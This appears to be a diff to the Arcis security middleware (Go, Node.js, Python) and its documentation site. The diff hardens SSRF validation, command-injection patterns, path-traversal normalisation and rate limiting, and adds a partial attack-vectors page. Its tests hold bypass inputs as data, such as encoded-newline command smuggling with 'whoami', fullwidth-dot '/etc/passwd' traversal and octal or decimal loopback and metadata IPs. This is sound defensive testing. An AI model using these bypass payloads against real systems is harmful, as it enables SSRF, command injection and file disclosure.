+	// Check if any part uses octal (leading 0) or hex (0x) notation
+	hasAlternate := false
+	for _, p := range parts {
+		if len(p) > 1 && p[0] == '0' {
+			if len(p) > 2 && (p[1] == 'x' || p[1] == 'X') {
+				hasAlternate = true // hex
+			} else if p[1] >= '0' && p[1] <= '7' {
+				hasAlternate = true // octal
+			}
+		}
+	}
+	if !hasAlternate {
+		return ""
+	}
+
+	octets := make([]int, 4)
+	for i, part := range parts {
+		var val int64
+		var err error
+		if len(part) > 2 && (part[:2] == "0x" || part[:2] == "0X") {
+			val, err = strconv.ParseInt(part[2:], 16, 64)
+		} else if len(part) > 1 && part[0] == '0' {
+			val, err = strconv.ParseInt(part, 8, 64)
+		} else {
+			val, err = strconv.ParseInt(part, 10, 64)
+		}
+		if err != nil || val < 0 || val > 255 {
+			return ""
+		}
+		octets[i] = int(val)
+	}
+
+	dotted := strconv.Itoa(octets[0]) + "." + strconv.Itoa(octets[1]) + "." + strconv.Itoa(octets[2]) + "." + strconv.Itoa(octets[3])
+
+	if !allowLocalhost && octets[0] == 127 {
+		return "loopback address (octal/hex IP: " + dotted + ")"
+	}
+	if !allowPrivate {
+		if reason := checkPrivateIP(dotted); reason != "" {
+			return reason + " (octal/hex IP: " + dotted + ")"
+		}
+	}
 	return ""
 }

--- a/packages/arcis-go/utils/url_test.go
+++ b/packages/arcis-go/utils/url_test.go
@@ -1,6 +1,9 @@
 package utils
 
-import "testing"
+import (
+	"strings"
+	"testing"
+)
 
 func TestValidateURL(t *testing.T) {
 	tests := []struct {
@@ -61,6 +64,59 @@ func TestValidateURL(t *testing.T) {
 			}
 			if tt.reason != "" && result.Reason != tt.reason {
 				t.Errorf("ValidateURL(%q).Reason = %q, want %q", tt.url, result.Reason, tt.reason)
+			}
+		})
+	}
+}
+
+func TestValidateURL_DecimalIP(t *testing.T) {
+	tests := []struct {
+		name       string
+		url        string
+		safe       bool
+		reasonHas  string
+	}{
+		{"blocks decimal 127.0.0.1 (2130706433)", "http://2130706433/", false, "loopback"},
+		{"blocks decimal 10.0.0.1 (167772161)", "http://167772161/", false, "private"},
+		{"blocks decimal 192.168.1.1 (3232235777)", "http://3232235777/", false, "private"},
+		{"blocks decimal 169.254.169.254 (2852039166)", "http://2852039166/", false, "link-local"},
+		{"allows safe decimal 8.8.8.8 (134744072)", "http://134744072/", true, ""},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := ValidateURL(tt.url, nil)
+			if result.Safe != tt.safe {
+				t.Errorf("ValidateURL(%q).Safe = %v, want %v (reason: %s)", tt.url, result.Safe, tt.safe, result.Reason)
+			}
+			if tt.reasonHas != "" && !strings.Contains(strings.ToLower(result.Reason), tt.reasonHas) {
+				t.Errorf("ValidateURL(%q).Reason = %q, want it to contain %q", tt.url, result.Reason, tt.reasonHas)
+			}
+		})
+	}
+}
+
+func TestValidateURL_OctalHexIP(t *testing.T) {
+	tests := []struct {
+		name       string
+		url        string
+		safe       bool
+		reasonHas  string
+	}{
+		{"blocks octal 127.0.0.1 (0177.0.0.1)", "http://0177.0.0.1/", false, "loopback"},
+		{"blocks octal 10.0.0.1 (012.0.0.1)", "http://012.0.0.1/", false, "private"},
+		{"blocks hex 127.0.0.1 (0x7f.0.0.1)", "http://0x7f.0.0.1/", false, "loopback"},
+		{"blocks hex 10.0.0.1 (0x0a.0.0.1)", "http://0x0a.0.0.1/", false, "private"},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			result := ValidateURL(tt.url, nil)
+			if result.Safe != tt.safe {
+				t.Errorf("ValidateURL(%q).Safe = %v, want %v (reason: %s)", tt.url, result.Safe, tt.safe, result.Reason)
+			}
+			if tt.reasonHas != "" && !strings.Contains(strings.ToLower(result.Reason), tt.reasonHas) {
+				t.Errorf("ValidateURL(%q).Reason = %q, want it to contain %q", tt.url, result.Reason, tt.reasonHas)
 			}
 		})
 	}

--- a/packages/arcis-node/package.json
+++ b/packages/arcis-node/package.json
@@ -1,7 +1,7 @@
 {
   "name": "@arcis/node",
   "version": "1.4.1",
-  "description": "One line of code protects your Node.js app against 20+ security flaws at runtime — XSS, SQL injection, CSRF, SSRF, HPP, rate limiting, bot detection, and more. Zero dependencies. Supply chain attack scanner included.",
+  "description": "Zero-dependency security middleware for Node.js. Protects against XSS, SQL injection, CSRF, SSRF, HPP, rate limiting, bot detection, and 15+ more attack types. Supply chain attack scanner included.",
   "main": "dist/index.js",
   "module": "dist/index.mjs",
   "types": "dist/index.d.ts",

--- a/packages/arcis-node/package.json
+++ b/packages/arcis-node/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@arcis/node",
-  "version": "1.4.1",
+  "version": "1.4.2",
   "description": "Zero-dependency security middleware for Node.js. Protects against XSS, SQL injection, CSRF, SSRF, HPP, rate limiting, bot detection, and 15+ more attack types. Supply chain attack scanner included.",
   "main": "dist/index.js",
   "module": "dist/index.mjs",

--- a/packages/arcis-node/src/core/constants.ts
+++ b/packages/arcis-node/src/core/constants.ts
@@ -213,8 +213,8 @@ export const COMMAND_PATTERNS = [
   /[;&|`]/g,
   /** Command substitution: $( ... ) — matched as a pair to reduce false positives */
   /\$\(/g,
-  /** URL-encoded newline/carriage-return injection (%0a, %0d) */
-  /%0[ad]/gi,
+  /** URL-encoded control characters (%00-%0F): null, tab, vtab, formfeed, LF, CR */
+  /%0[0-9a-f]/gi,
 ] as const;
 
 // =============================================================================

--- a/packages/arcis-node/src/middleware/rate-limit.ts
+++ b/packages/arcis-node/src/middleware/rate-limit.ts
@@ -131,8 +131,27 @@ export function createRateLimiter(options: RateLimitOptions = {}): RateLimiterMi
 
       next();
     } catch (error) {
-      // Log error but fail open (allow request through) to prevent DoS
-      console.error('[arcis] Rate limiter error:', error);
+      // External store failed — fall back to in-memory rate limiting.
+      // Pure fail-open is a security bypass; in-memory fallback maintains protection.
+      console.error('[arcis] Rate limiter store error, using in-memory fallback:', error);
+      try {
+        const key = keyGenerator(req);
+        const now = Date.now();
+        if (!inMemoryStore[key] || inMemoryStore[key].resetTime < now) {
+          inMemoryStore[key] = { count: 1, resetTime: now + windowMs };
+        } else {
+          inMemoryStore[key].count++;
+        }
+        const count = inMemoryStore[key].count;
+        if (count > max) {
+          const resetSeconds = Math.ceil((inMemoryStore[key].resetTime - now) / 1000);
+          res.setHeader('Retry-After', resetSeconds.toString());
+          res.status(statusCode).json({ error: message, retryAfter: resetSeconds });
+          return;
+        }
+      } catch {
+        // If even fallback fails, allow through to preserve availability
+      }
       next();
     }
   };

--- a/packages/arcis-node/src/sanitizers/encode.ts
+++ b/packages/arcis-node/src/sanitizers/encode.ts
@@ -64,19 +64,24 @@ export function encodeForAttribute(value: string): string {
 export function encodeForJs(value: string): string {
   if (!value) return '';
   let result = '';
-  for (let i = 0; i < value.length; i++) {
-    const ch = value.charCodeAt(i);
+  // Use for-of to iterate codepoints, not UTF-16 code units.
+  // This correctly handles surrogate pairs (emoji, symbols outside BMP).
+  for (const char of value) {
+    const cp = char.codePointAt(0)!;
     // Allow a-z A-Z 0-9
     if (
-      (ch >= 0x30 && ch <= 0x39) || // 0-9
-      (ch >= 0x41 && ch <= 0x5a) || // A-Z
-      (ch >= 0x61 && ch <= 0x7a)    // a-z
+      (cp >= 0x30 && cp <= 0x39) || // 0-9
+      (cp >= 0x41 && cp <= 0x5a) || // A-Z
+      (cp >= 0x61 && cp <= 0x7a)    // a-z
     ) {
-      result += value[i];
-    } else if (ch < 0x100) {
-      result += `\\x${ch.toString(16).toUpperCase().padStart(2, '0')}`;
+      result += char;
+    } else if (cp < 0x100) {
+      result += `\\x${cp.toString(16).toUpperCase().padStart(2, '0')}`;
+    } else if (cp <= 0xFFFF) {
+      result += `\\u${cp.toString(16).toUpperCase().padStart(4, '0')}`;
     } else {
-      result += `\\u${ch.toString(16).toUpperCase().padStart(4, '0')}`;
+      // Codepoints above BMP — use ES6 Unicode escape
+      result += `\\u{${cp.toString(16).toUpperCase()}}`;
     }
   }
   return result;

--- a/packages/arcis-node/src/sanitizers/path.ts
+++ b/packages/arcis-node/src/sanitizers/path.ts
@@ -31,6 +31,10 @@ export function sanitizePath(input: string, collectThreats = false): string | Sa
   let value = input;
   let wasSanitized = false;
 
+  // SECURITY: Normalize Unicode to NFKC before pattern matching.
+  // Fullwidth dot U+FF0E normalizes to '.', preventing ．．/ bypass of ../ detection.
+  value = value.normalize('NFKC');
+
   // Apply patterns repeatedly until the string stops changing.
   // Single-pass stripping is bypassable: "....//".replace("../","") → "../"
   let prev: string;
@@ -77,10 +81,13 @@ export function sanitizePath(input: string, collectThreats = false): string | Sa
  */
 export function detectPathTraversal(input: string): boolean {
   if (typeof input !== 'string') return false;
-  
+
+  // SECURITY: Normalize Unicode to NFKC — same as sanitizePath
+  const normalized = input.normalize('NFKC');
+
   for (const pattern of PATH_PATTERNS) {
     pattern.lastIndex = 0;
-    if (pattern.test(input)) {
+    if (pattern.test(normalized)) {
       return true;
     }
   }

--- a/packages/arcis-node/src/validation/url.ts
+++ b/packages/arcis-node/src/validation/url.ts
@@ -200,14 +200,20 @@ function checkPrivateIp(hostname: string): string | null {
     return 'cloud metadata endpoint';
   }
 
-  // IPv6 private ranges (simplified — bracket-wrapped in URLs)
-  const ipv6 = hostname.replace(/^\[|\]$/g, '');
+  // IPv6 private ranges (bracket-wrapped in URLs)
+  let ipv6 = hostname.replace(/^\[|\]$/g, '');
+  // Strip zone ID (e.g., ::1%eth0 → ::1)
+  const zoneIdx = ipv6.indexOf('%');
+  if (zoneIdx !== -1) {
+    ipv6 = ipv6.slice(0, zoneIdx);
+  }
   if (
     ipv6 === '::1' ||
     ipv6 === '::' ||
-    ipv6.startsWith('fc') ||
-    ipv6.startsWith('fd') ||
-    ipv6.startsWith('fe80')
+    /^fc[0-9a-f]{2}:/i.test(ipv6) ||
+    /^fd[0-9a-f]{2}:/i.test(ipv6) ||
+    /^fe80:/i.test(ipv6) ||
+    /^ff[0-9a-f]{2}:/i.test(ipv6)  // IPv6 multicast (ff00::/8)
   ) {
     return 'private IPv6 address';
   }

--- a/packages/arcis-node/tests/sanitizers/command.test.ts
+++ b/packages/arcis-node/tests/sanitizers/command.test.ts
@@ -47,6 +47,26 @@ describe('sanitizeCommand', () => {
       const result = sanitizeCommand('file.txt%0Aid');
       expect(result).not.toMatch(/%0[aA]/);
     });
+
+    it('should block %0B (URL-encoded vertical tab)', () => {
+      const result = sanitizeCommand('file.txt%0Bwhoami');
+      expect(result.toLowerCase()).not.toMatch(/%0b/);
+    });
+
+    it('should block %0C (URL-encoded form feed)', () => {
+      const result = sanitizeCommand('file.txt%0Cwhoami');
+      expect(result.toLowerCase()).not.toMatch(/%0c/);
+    });
+
+    it('should block %09 (URL-encoded tab)', () => {
+      const result = sanitizeCommand('file.txt%09whoami');
+      expect(result.toLowerCase()).not.toMatch(/%09/);
+    });
+
+    it('should block %00 (URL-encoded null byte)', () => {
+      const result = sanitizeCommand('file.txt%00whoami');
+      expect(result.toLowerCase()).not.toMatch(/%00/);
+    });
   });
 
   describe('Command Chaining and Substitution', () => {

--- a/packages/arcis-node/tests/sanitizers/path.test.ts
+++ b/packages/arcis-node/tests/sanitizers/path.test.ts
@@ -180,4 +180,30 @@ describe('detectPathTraversal', () => {
   it('should handle non-string input', () => {
     expect(detectPathTraversal(123 as unknown as string)).toBe(false);
   });
+
+  it('should detect fullwidth dot traversal (U+FF0E)', () => {
+    expect(detectPathTraversal('\uFF0E\uFF0E/etc/passwd')).toBe(true);
+  });
+
+  it('should detect fullwidth slash traversal (U+FF0F)', () => {
+    expect(detectPathTraversal('..\uFF0Fetc')).toBe(true);
+  });
+});
+
+describe('Unicode Normalization Bypass', () => {
+  it('should block fullwidth dot traversal (U+FF0E)', () => {
+    const result = sanitizePath('\uFF0E\uFF0E/etc/passwd');
+    expect(result).not.toContain('../');
+    expect(result).not.toContain('\uFF0E\uFF0E/');
+  });
+
+  it('should block fullwidth slash traversal (U+FF0F)', () => {
+    const result = sanitizePath('..\uFF0Fetc\uFF0Fpasswd');
+    expect(result).not.toContain('../');
+  });
+
+  it('should block one-dot-leader traversal (U+2024)', () => {
+    const result = sanitizePath('\u2024\u2024/etc/passwd');
+    expect(result).not.toContain('../');
+  });
 });

--- a/packages/arcis-node/tsconfig.dts.json
+++ b/packages/arcis-node/tsconfig.dts.json
@@ -1,0 +1,7 @@
+{
+  "extends": "./tsconfig.json",
+  "compilerOptions": {
+    "moduleResolution": "node16",
+    "emitDeclarationOnly": true
+  }
+}

--- a/packages/arcis-python/arcis/__init__.py
+++ b/packages/arcis-python/arcis/__init__.py
@@ -163,7 +163,7 @@ try:
 except ImportError:
     _HAS_ASYNC = False
 
-__version__ = "1.4.1"
+__version__ = "1.4.2"
 __all__ = [
     # Main class
     "Arcis",

--- a/packages/arcis-python/arcis/middleware/rate_limit.py
+++ b/packages/arcis-python/arcis/middleware/rate_limit.py
@@ -55,6 +55,7 @@ class RateLimiter:
         self._store_provided = store is not None
         self.store = store or InMemoryStore()
         self._closed = False
+        self._fallback_lock = threading.Lock()
 
         # Start cleanup thread only for in-memory store
         # External stores (e.g. Redis) handle their own expiry
@@ -118,18 +119,21 @@ class RateLimiter:
             now = time.time()
             reset = max(0, int(reset_time - now))
         else:
-            now = time.time()
-            entry = self.store.get(key)
-            if not entry:
-                self.store.set(key, 1, now + self.window_seconds)
-                return {
-                    "allowed": True,
-                    "limit": self.max_requests,
-                    "remaining": self.max_requests - 1,
-                    "reset": int(self.window_seconds),
-                }
-            count = self.store.increment(key)
-            reset = max(0, int(entry.reset_time - now))
+            # Serialize get+increment to prevent TOCTOU race where two threads
+            # both see count=N and both pass through.
+            with self._fallback_lock:
+                now = time.time()
+                entry = self.store.get(key)
+                if not entry:
+                    self.store.set(key, 1, now + self.window_seconds)
+                    return {
+                        "allowed": True,
+                        "limit": self.max_requests,
+                        "remaining": self.max_requests - 1,
+                        "reset": int(self.window_seconds),
+                    }
+                count = self.store.increment(key)
+                reset = max(0, int(entry.reset_time - now))
 
         remaining = max(0, self.max_requests - count)
 

--- a/packages/arcis-python/arcis/sanitizers/sanitize.py
+++ b/packages/arcis-python/arcis/sanitizers/sanitize.py
@@ -7,6 +7,7 @@ path traversal, and command injection.
 
 import re
 import types
+import unicodedata
 from typing import Any, Dict, List, Set
 
 from ..core.constants import PATTERNS, DEFAULT_MAX_INPUT_SIZE, MAX_RECURSION_DEPTH
@@ -126,6 +127,9 @@ class Sanitizer:
         # Path traversal prevention — loop until stable to prevent bypass via
         # nested sequences: "....//".replace("../","") → "../"
         if self.path:
+            # SECURITY: Normalize Unicode to NFKC before path pattern matching.
+            # Fullwidth dot U+FF0E normalizes to '.', preventing bypass of ../ detection.
+            result = unicodedata.normalize('NFKC', result)
             prev = None
             while prev != result:
                 prev = result

--- a/packages/arcis-python/pyproject.toml
+++ b/packages/arcis-python/pyproject.toml
@@ -4,7 +4,7 @@ build-backend = "setuptools.build_meta"
 
 [project]
 name = "arcis"
-version = "1.4.1"
+version = "1.4.2"
 description = "Zero-dependency security middleware for Python. Protects against XSS, SQL injection, CSRF, SSRF, HPP, rate limiting, bot detection, and 15+ more attack types. Works with Flask, FastAPI, and Django."
 readme = "README.md"
 license = {text = "MIT"}

--- a/packages/arcis-python/pyproject.toml
+++ b/packages/arcis-python/pyproject.toml
@@ -5,7 +5,7 @@ build-backend = "setuptools.build_meta"
 [project]
 name = "arcis"
 version = "1.4.1"
-description = "One line of code protects your Python app against 20+ security flaws at runtime — XSS, SQL injection, CSRF, SSRF, HPP, rate limiting, bot detection, and more. Zero dependencies. Works with Flask, FastAPI, and Django."
+description = "Zero-dependency security middleware for Python. Protects against XSS, SQL injection, CSRF, SSRF, HPP, rate limiting, bot detection, and 15+ more attack types. Works with Flask, FastAPI, and Django."
 readme = "README.md"
 license = {text = "MIT"}
 authors = [

--- a/packages/arcis-python/tests/sanitizers/test_sanitize.py
+++ b/packages/arcis-python/tests/sanitizers/test_sanitize.py
@@ -123,6 +123,17 @@ class TestSanitizeStringPathTraversal:
         result = sanitize_string("%252e%252e/etc/passwd")
         assert "%252e" not in result.lower()
 
+    def test_unicode_fullwidth_dot_bypass(self):
+        """Fullwidth dot U+FF0E should not bypass ../ detection after NFKC normalization."""
+        result = sanitize_string('\uff0e\uff0e/etc/passwd')
+        assert '../' not in result
+        assert '\uff0e\uff0e/' not in result
+
+    def test_unicode_fullwidth_slash_bypass(self):
+        """Fullwidth slash U+FF0F should not bypass path traversal detection."""
+        result = sanitize_string('..\uff0fetc\uff0fpasswd')
+        assert '../' not in result
+
 
 class TestSanitizeStringCommandInjection:
     """Test command injection prevention in sanitize_string."""
@@ -161,6 +172,22 @@ class TestSanitizeStringCommandInjection:
     def test_removes_url_encoded_carriage_return(self):
         result = sanitize_string("file.txt%0dwhoami")
         assert "%0d" not in result.lower()
+
+    def test_removes_url_encoded_vertical_tab(self):
+        result = sanitize_string("file.txt%0Bwhoami")
+        assert "%0b" not in result.lower()
+
+    def test_removes_url_encoded_form_feed(self):
+        result = sanitize_string("file.txt%0Cwhoami")
+        assert "%0c" not in result.lower()
+
+    def test_removes_url_encoded_tab(self):
+        result = sanitize_string("file.txt%09whoami")
+        assert "%09" not in result.lower()
+
+    def test_removes_url_encoded_null_byte(self):
+        result = sanitize_string("file.txt%00whoami")
+        assert "%00" not in result.lower()
 
     def test_safe_input_unchanged(self):
         from arcis.sanitizers.sanitize import Sanitizer

--- a/packages/core/patterns.json
+++ b/packages/core/patterns.json
@@ -239,10 +239,10 @@
           "redos_safe": true
         },
         {
-          "id": "cmdi-newline",
-          "pattern": "%0[aAdD]",
+          "id": "cmdi-control-chars",
+          "pattern": "%0[0-9a-fA-F]",
           "flags": "gi",
-          "description": "Detects URL-encoded newline/carriage-return injection",
+          "description": "Detects URL-encoded control characters (%00-%0F) including null, tab, vertical tab, form feed, LF, CR",
           "redos_safe": true
         },
         {

--- a/website/documentation/api-reference.html
+++ b/website/documentation/api-reference.html
@@ -1,0 +1,220 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <script async src="https://www.googletagmanager.com/gtag/js?id=G-TGPW4N5TR2"></script>
+  <script>
+    window.dataLayer = window.dataLayer || [];
+    function gtag(){dataLayer.push(arguments);}
+    gtag('js', new Date());
+    gtag('config', 'G-TGPW4N5TR2');
+  </script>
+  <title>API Reference · Arcis Docs</title>
+  <meta name="description" content="Every exported function across Arcis Node.js, Python, and Go SDKs.">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=EB+Garamond:ital,wght@0,400;0,500;0,600;0,700;1,400&family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="docs.css">
+</head>
+<body>
+
+  <nav class="docs-nav" id="nav">
+    <div class="docs-nav-inner">
+      <a href="../" class="docs-logo">Arcis<span>.</span></a>
+      <ul class="docs-nav-links">
+        <li><a href="../#how-it-works">How It Works</a></li>
+        <li><a href="../#languages">Languages</a></li>
+        <li><a href="../#threats">Threats</a></li>
+        <li><a href="../#comparison">Compare</a></li>
+        <li><a href="./" class="active">Docs</a></li>
+      </ul>
+      <div class="docs-nav-cta">
+        <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener" class="btn-star" id="starBtn">
+          <svg viewBox="0 0 16 16" fill="currentColor"><path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.75.75 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Z"/></svg>
+          Star
+          <span class="star-count" id="starCount"></span>
+        </a>
+        <a href="./getting-started.html" class="btn-primary-nav">
+          Try Arcis
+          <svg width="14" height="14" viewBox="0 0 16 16" fill="none" stroke="currentColor" stroke-width="2"><path d="M3 8h10M9 4l4 4-4 4"/></svg>
+        </a>
+      </div>
+    </div>
+  </nav>
+
+  <div class="docs-layout">
+    <aside class="docs-sidebar" id="sidebar">
+      <h3>Overview</h3>
+      <ul>
+        <li><a href="./">Introduction</a></li>
+        <li><a href="./getting-started.html">Getting Started</a></li>
+      </ul>
+      <h3>Guides</h3>
+      <ul>
+        <li><a href="./frameworks.html">Framework Adapters</a></li>
+        <li><a href="./configuration.html">Configuration</a></li>
+        <li><a href="./attack-vectors.html">Attack Vectors</a></li>
+      </ul>
+      <h3>Reference</h3>
+      <ul>
+        <li><a href="./api-reference.html" class="active">API Reference</a></li>
+        <li><a href="./cli.html">CLI Tools</a></li>
+      </ul>
+      <h3>Resources</h3>
+      <ul>
+        <li><a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></li>
+        <li><a href="https://www.npmjs.com/package/@arcis/node" target="_blank" rel="noopener">npm package</a></li>
+        <li><a href="https://pypi.org/project/arcis/" target="_blank" rel="noopener">PyPI package</a></li>
+      </ul>
+    </aside>
+
+    <main class="docs-content">
+      <button class="sidebar-toggle" onclick="document.getElementById('sidebar').classList.toggle('mobile-open')">☰ Menu</button>
+
+      <div class="docs-breadcrumb"><a href="./">Docs</a> / API Reference</div>
+      <h1>API Reference</h1>
+      <p class="lead">
+        Every exported function across all three SDKs. Function names differ by language convention (<code>camelCase</code> in Node.js, <code>snake_case</code> in Python, <code>PascalCase</code> in Go) but behavior is identical.
+      </p>
+
+      <h2 id="middleware">Middleware</h2>
+
+      <h3><code>arcis(config?)</code></h3>
+      <p>The main middleware. Activates sanitization, rate limiting, and security headers.</p>
+      <table>
+        <thead><tr><th>SDK</th><th>Usage</th></tr></thead>
+        <tbody>
+          <tr><td>Node.js</td><td><code>app.use(arcis(config))</code></td></tr>
+          <tr><td>Python (FastAPI)</td><td><code>app.add_middleware(ArcisMiddleware, config=Config(...))</code></td></tr>
+          <tr><td>Python (Flask)</td><td><code>Arcis(app, config=Config(...))</code></td></tr>
+          <tr><td>Go (Gin)</td><td><code>r.Use(arcisgin.Middleware())</code></td></tr>
+        </tbody>
+      </table>
+
+      <h3><code>corsProtection(options)</code></h3>
+      <p>Whitelist-based CORS enforcement. Opt-in.</p>
+
+      <h3><code>csrfProtection(options)</code></h3>
+      <p>Double-submit cookie CSRF with HMAC. Opt-in.</p>
+
+      <h3><code>botProtection(options)</code></h3>
+      <p>80+ bot pattern detection with per-fingerprint rate limiting. Opt-in.</p>
+
+      <h3><code>cookieSecurity(options)</code></h3>
+      <p>Enforces HttpOnly, Secure, SameSite on all cookies. Opt-in.</p>
+
+      <h2 id="sanitizers">Sanitizers</h2>
+      <p>Framework-agnostic. Take strings, return sanitized strings.</p>
+
+      <table>
+        <thead><tr><th>Function</th><th>What it does</th></tr></thead>
+        <tbody>
+          <tr><td><code>sanitizeString(input)</code></td><td>Applies all enabled sanitizers to a string.</td></tr>
+          <tr><td><code>sanitizeObject(obj)</code></td><td>Recursively sanitizes an object, stripping dangerous keys.</td></tr>
+          <tr><td><code>sanitizeXss(input)</code></td><td>Strip XSS patterns and HTML-encode.</td></tr>
+          <tr><td><code>sanitizeSql(input)</code></td><td>Replace SQL patterns with <code>[BLOCKED]</code>.</td></tr>
+          <tr><td><code>sanitizePath(input)</code></td><td>Strip path traversal patterns (with NFKC normalization).</td></tr>
+          <tr><td><code>sanitizeCommand(input)</code></td><td>Strip shell metacharacters and control chars.</td></tr>
+          <tr><td><code>sanitizeSsti(input)</code></td><td>Strip SSTI template syntax.</td></tr>
+          <tr><td><code>sanitizeXxe(input)</code></td><td>Strip XXE DOCTYPE / ENTITY syntax.</td></tr>
+          <tr><td><code>sanitizeJsonpCallback(input)</code></td><td>Validate and return safe callback identifiers only.</td></tr>
+          <tr><td><code>sanitizeHeaderValue(input)</code></td><td>Strip CRLF, null bytes from header values.</td></tr>
+          <tr><td><code>sanitizeLdap(input)</code></td><td>Escape LDAP filter special characters.</td></tr>
+          <tr><td><code>sanitizeLdapDn(input)</code></td><td>Escape LDAP DN special characters.</td></tr>
+        </tbody>
+      </table>
+
+      <h2 id="detectors">Detectors</h2>
+      <p>Return <code>true</code>/<code>false</code> without modifying input. Useful for logging or custom handling.</p>
+
+      <table>
+        <thead><tr><th>Function</th><th>Detects</th></tr></thead>
+        <tbody>
+          <tr><td><code>detectXss(input)</code></td><td>Script injection, event handlers, JS URIs.</td></tr>
+          <tr><td><code>detectSql(input)</code></td><td>SQL keywords, boolean tautology, comments.</td></tr>
+          <tr><td><code>detectSsti(input)</code></td><td>Template syntax.</td></tr>
+          <tr><td><code>detectXxe(input)</code></td><td>XML entity declarations.</td></tr>
+          <tr><td><code>detectPathTraversal(input)</code></td><td><code>../</code> and encoded variants.</td></tr>
+          <tr><td><code>detectCommandInjection(input)</code></td><td>Shell metacharacters, subshells.</td></tr>
+          <tr><td><code>detectHeaderInjection(input)</code></td><td>CRLF injection patterns.</td></tr>
+          <tr><td><code>detectLdapInjection(input)</code></td><td>LDAP filter injection.</td></tr>
+          <tr><td><code>detectNoSqlInjection(obj)</code></td><td>Dangerous MongoDB operators in object.</td></tr>
+          <tr><td><code>detectPrototypePollution(obj)</code></td><td>Prototype-polluting keys in object.</td></tr>
+        </tbody>
+      </table>
+
+      <h2 id="encoders">Context-Aware Encoders</h2>
+      <p>Use when rendering user content in different output contexts.</p>
+
+<pre><code><span class="k">import</span> <span class="p">{</span>
+  encodeForHtml<span class="p">,</span>       <span class="c">// HTML body: &amp;, &lt;, &gt;, ", '</span>
+  encodeForAttribute<span class="p">,</span>  <span class="c">// HTML attributes: all non-alphanumeric as &amp;#xHH;</span>
+  encodeForJs<span class="p">,</span>         <span class="c">// JS string: \xHH / \uHHHH</span>
+  encodeForUrl<span class="p">,</span>        <span class="c">// URL param: encodeURIComponent + extra chars</span>
+  encodeForCss<span class="p">,</span>        <span class="c">// CSS value: \HH with trailing space</span>
+<span class="p">}</span> <span class="k">from</span> <span class="s">'@arcis/node'</span><span class="p">;</span></code></pre>
+
+      <h2 id="validators">Validators</h2>
+
+      <h3><code>validateUrl(url, options?)</code></h3>
+      <p>SSRF-safe URL validation. Blocks private IPs, loopback, cloud metadata, IP-encoding bypasses.</p>
+<pre><code>validateUrl<span class="p">(</span><span class="s">'http://169.254.169.254/'</span><span class="p">)</span>
+<span class="c">// { safe: false, reason: 'link-local address (169.254.0.0/16)' }</span>
+
+validateUrl<span class="p">(</span><span class="s">'https://api.example.com/'</span><span class="p">)</span>
+<span class="c">// { safe: true }</span></code></pre>
+
+      <h3><code>validateRedirect(url, allowlist)</code></h3>
+      <p>Open redirect prevention. Only allows paths or whitelisted hosts.</p>
+
+      <h3><code>validateEmail(email)</code></h3>
+      <p>Email validation with disposable blocklist, typo suggestions, optional MX check.</p>
+
+      <h2 id="pii">PII Detection</h2>
+
+      <h3><code>scanPii(input)</code></h3>
+      <p>Returns an array of PII matches found (email, phone, SSN, credit card).</p>
+
+      <h3><code>redactPii(input)</code></h3>
+      <p>Returns the input with detected PII redacted (e.g., <code>****-****-1234</code>).</p>
+
+      <h2 id="stores">Rate Limit Stores</h2>
+
+      <h3><code>MemoryStore</code></h3>
+      <p>Default in-memory store. Fine for single-instance deployments.</p>
+
+      <h3><code>RedisStore({ client })</code></h3>
+      <p>For multi-instance / distributed rate limiting. Pass a <code>redis</code> client instance.</p>
+
+      <h2 id="logging">Logging</h2>
+
+      <h3><code>createSafeLogger(logger)</code></h3>
+      <p>Wraps any logger to auto-redact PII and secrets from log entries.</p>
+
+      <div class="docs-pagination">
+        <a href="./attack-vectors.html" class="prev">
+          <span class="nav-label">← Previous</span>
+          <span class="nav-title">Attack Vectors</span>
+        </a>
+        <a href="./cli.html" class="next">
+          <span class="nav-label">Next →</span>
+          <span class="nav-title">CLI Tools</span>
+        </a>
+      </div>
+    </main>
+  </div>
+
+  <footer class="docs-footer">
+    <div>© 2026 Arcis. MIT Licensed.</div>
+    <div><a href="../">Home</a> · <a href="https://github.com/Gagancm/arcis" target="_blank" rel="noopener">GitHub</a></div>
+  </footer>
+
+  <script>
+    fetch('https://api.github.com/repos/Gagancm/arcis')
+      .then(r => r.json())
+      .then(d => { if (d.stargazers_count !== undefined) { const el = document.getElementById('starCount'); if (el) el.textContent = d.stargazers_count; } })
+      .catch(() => {});
+  </script>
+</body>
+</html>

--- a/website/documentation/attack-vectors.html
+++ b/website/documentation/attack-vectors.html
@@ -1,0 +1,185 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <script async src="https://www.googletagmanager.com/gtag/js?id=G-TGPW4N5TR2"></script>
+  <script>
+    window.dataLayer = window.dataLayer || [];
+    function gtag(){dataLayer.push(arguments);}
+    gtag('js', new Date());
+    gtag('config', 'G-TGPW4N5TR2');
+  </script>
+  <title>Attack Vectors · Arcis Docs</title>
+  <meta name="description" content="Every attack type Arcis blocks, how it works, and how Arcis stops it.">
+  <link rel="preconnect" href="https://fonts.googleapis.com">
+  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+  <link href="https://fonts.googleapis.com/css2?family=EB+Garamond:ital,wght@0,400;0,500;0,600;0,700;1,400&family=Inter:wght@400;500;600;700&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+  <link rel="stylesheet" href="docs.css">
+</head>
+<body>
+
+  <nav class="docs-nav" id="nav">
+    <div class="docs-nav-inner">
